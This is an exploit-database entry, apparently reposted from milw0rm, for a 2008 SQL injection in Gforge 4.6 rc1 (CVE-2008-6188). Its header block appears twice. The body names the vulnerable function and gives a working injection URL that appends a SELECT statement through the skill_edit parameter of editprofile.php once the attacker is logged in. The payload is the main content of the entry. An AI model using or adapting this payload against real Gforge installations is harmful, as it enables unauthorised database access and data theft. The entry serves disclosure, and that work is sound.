Gforge 4.6 rc1 - 'skill_edit' SQL Injection
| EKU-ID: 14585 | CVE: OSVDB-49147;CVE-2008-6188 | OSVDB-ID: |
| Author: beford | Published: 2008-10-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 14585 | CVE: OSVDB-49147;CVE-2008-6188 | OSVDB-ID: |
| Author: beford | Published: 2008-10-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Gforge <= 4.6 rc1 skill_edit SQL injection Vendor Notified: 2008-10-06 Impact: zomg! Note: should work regardless magic_quotes_gpc setting. Requires: Creating an account and be logged in Vulnerable function: handle_multi_edit($skill_ids) on /www/people/skills_utils.php http://gforge.site/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit # milw0rm.com [2008-10-09]